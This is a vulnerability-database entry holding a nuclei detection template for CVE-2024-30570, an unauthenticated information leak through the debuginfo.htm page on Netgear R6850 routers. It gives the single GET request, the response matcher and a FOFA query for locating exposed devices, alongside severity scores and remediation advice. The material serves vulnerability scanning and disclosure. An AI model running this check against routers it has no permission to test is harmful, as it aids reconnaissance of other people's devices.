Lucene search
K

Netgear R6850 - Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Netgear R6850 router has a medium severity information disclosure vulnerability via debuginfo.htm page.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-30570
26 Mar 202512:41
circl
CNNVD
Netgear R6850 安全漏洞
3 Apr 202400:00
cnnvd
CVE
CVE-2024-30570
3 Apr 202400:00
cve
Cvelist
CVE-2024-30570
3 Apr 202400:00
cvelist
NVD
CVE-2024-30570
3 Apr 202413:16
nvd
OSV
CVE-2024-30570
3 Apr 202413:16
osv
Positive Technologies
PT-2024-23498 · NetGear · Netgear R6850
3 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-30570
23 May 202510:07
redhatcve
Vulnrichment
CVE-2024-30570
3 Apr 202400:00
vulnrichment
id: CVE-2024-30570

info:
  name: Netgear R6850 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the debuginfo.htm page. This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as product model name, WAN connection type, and potentially other system details.
  impact: |
    Attackers can obtain sensitive information from the router, potentially aiding further attacks.
  remediation: |
    Update Netgear R6850 firmware to a version that patches the information disclosure vulnerability.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88debuginfo.htm%EF%BC%89.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30570
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-30570
    cwe-id: CWE-200
    epss-score: 0.01231
    epss-percentile: 0.65328
  metadata:
    verified: true
    max-request: 1
    product: Netgear R6850 Router
    vendor: Netgear
    version: V1.1.0.88
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,netgear,router,exposure,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/debuginfo.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<br>WAN connection type"

      - type: status
        status:
          - 200
# digest: 490a00463044022039aec1f4c206e7ce20e54bc08d681418542303dd877c6b7fd510a7ad9bd8270a022051e7612327e94fd44f9590b82549d0becaed1e25dd849db5cea3434754cb52c4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.01231
SSVC
16